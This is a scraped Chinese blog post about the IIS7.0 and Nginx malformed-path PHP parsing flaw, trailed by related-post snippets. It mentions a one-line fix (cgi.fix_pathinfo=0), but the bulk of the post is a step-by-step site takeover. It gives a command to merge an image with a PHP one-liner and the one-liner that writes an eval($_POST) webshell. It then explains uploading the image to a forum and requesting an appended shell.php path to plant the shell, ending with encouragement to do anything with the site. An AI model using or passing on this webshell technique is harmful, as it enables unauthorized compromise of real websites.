iis+php解析漏洞修复,IIS7.0畸形解析漏洞通杀0day
IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。
临时解决办法:关闭cgi.fix_pathinfo为0
__________________________________
先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)
先合并一张PHP一句话图片马,合并方法:
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs (fopen("shell.PHP","w"),"<?eval(\$_POST[akt]);?>")?>"
图片随便找一张.
一句话:<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[akt])?>');?>
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。
比如假设图片地址为 www.webshell.cc/tupian/1.jpg
则执行地址为 www.webshell.cc/tupian/1.jpg/shell.php
然后,会在目录下生成shell.php。比如: www.xxx.com/tupian/shell.php
shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
剩下的就随便你去搞吧。
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1638.html
iis+php解析漏洞修复,IIS7.0畸形解析漏洞通杀0day相关推荐
- 通杀IIS7.0畸形解析0day漏洞
先合并一张PHP一句话图片马,合并方法: ①.DOS合并:copy 1.gif /b + 1.txt/a asp.gif ②.用edjpgcom,进行图片和一句话木马的合并, 图片随便找一张. [顺带 ...
- java+poodle漏洞修复_SSL3.0 POODLE漏洞修复方案
SSL3.0 POODLE漏洞修复方案 发布时间:2014-10-15 15:02:27 关于SSLPOODLE漏洞 POODLE = Padding Oracle On Downgraded Leg ...
- iis php 缓存时间,推荐 IIS7.0下ThinkPHP提示“缓存文件写入失败!” 需要设置user的权限即可 Home/Runtime/Cache/...
IIS7.0下ThinkPHP提示"缓存文件写入失败!" 字号+作者:有田笔记 来源:有田笔记WP老站 2015-12-11 01:05 我要评论() 收藏成功收藏本文 :(缓存文 ...
- shrio反序列漏洞修复_Apache Shiro Java 反序列化漏洞分析
Author: rungobier(知道创宇404安全实验室) Date: 2016-08-03 0x00 概述 Apache Shiro 在 Java 的权限及安全验证框架中占用重要的一席之地,在它 ...
- 阿里云安全漏洞修复_7种云计算安全漏洞及其应对措施
阿里云安全漏洞修复 Companies are rapidly using the cloud to revolutionize their digital transformations. Acco ...
- e7xue.php漏洞_简要分析最近的dedecms通杀漏洞以及漏洞补丁的绕过
话说文章写得菜不要紧,首先标题要跟大牛一样! 作者:单恋一支花 出自:t00ls 转载请注明出处,如有雷同,纯属别人抄袭,嘿嘿! 一:写在前面 今天晚上想老婆了,失眠了,蛋裂之余,进吐司寻找基友,惊现 ...
- IIS 的负载均衡【IIS7.0以上才可以使用】---- Application Request Routing(ARR)
1.ARR依赖于以下组件: Microsoft URL Rewrite Module for IIS 7.0. Microsoft Web Farm Management Version 1 for ...
- ewebeditor文件上传漏洞2.8.0版本(漏洞复现)
漏洞概述 ewebeditor 是常用的网站后台编辑器,此编辑器有asp等版本. 登陆后台之后,可以通过修改上传文件白名单的方法,任意文件上传. 漏洞危害等级 高危 影响版本 v2.8.0 漏洞复现 ...
- dns服务器漏洞修复,KB4569509:DNS 服务器漏洞 CVE-2020-1350 指南
简介 2020 年 7 月 14 日,Microsoft 发布了针对 CVE-2020-1350 | Windows DNS 服务器远程代码执行漏洞中描述的问题的安全更新. 此通报描述了影响配置为运行 ...
最新文章
- E667:Fsync failed(how to solve)
- 亲 , Zookeeper了解一下 : 概述
- 解决log4net独占日志文件的问题以及 log4net的各种输出配置(Appender)
- docker logs 容器日志文件路径查看
- python调用rust_转 从20秒到0.5秒:一个使用Rust语言来优化Python性能的案例
- 用getBoundingClientRect()来获取页面元素的位置
- [原]排错实战——通过对比分析sysinternals事件修复程序功能异常
- 学习笔记 vs19 报错:E1696 C++ 无法打开 源 文件
- 下半年登场!小米MIX 4概念图曝光:有望首发屏下摄像头
- 网络ip计算器工具_火影忍者联名款计算器上市,卡西欧玩转IP联合
- 荣耀赵明 “Diss” 5G 手机;甲骨文创始人埃里森:Uber 一文不值;Chrome 77 发布 | 极客头条...
- 批处理(bat)文件中输出中文乱码怎么办?
- ITIL4讲解: 组合管理
- docker如何配置阿里云加速器
- udhcpc6的default.script
- Cass符号填充设置
- 国务院发展研究中心发布《中国云计算产业发展与应用白皮书》| 附下载
- c语言编程中的或逻辑的符号 符号如何输入,C语言中逻辑运算符(,||,!)和位运算符号(,|,^)...
- 测相伪距观测方程、线性组合
- loj #6570. 毛毛虫计数
热门文章
- ALD和CVD晶体管薄膜技术
- Linux下Flash-LED的处理
- 常用深度学习框——Caffe/TensorFlow / Keras/ PyTorch/MXNet
- 目标检测中的anchor-based 和anchor free
- 2021年大数据Flink(十):流处理相关概念
- pip install scipy和matplotlib报错的问题详解:(pip install其它时报错通用)
- python 内置函数map的使用
- Android ListView item设置分割线以及分割线宽度
- 网站项目必备——12款白富美型 jQuery 图片轮播插件
- 适定、超定和欠定方程的概念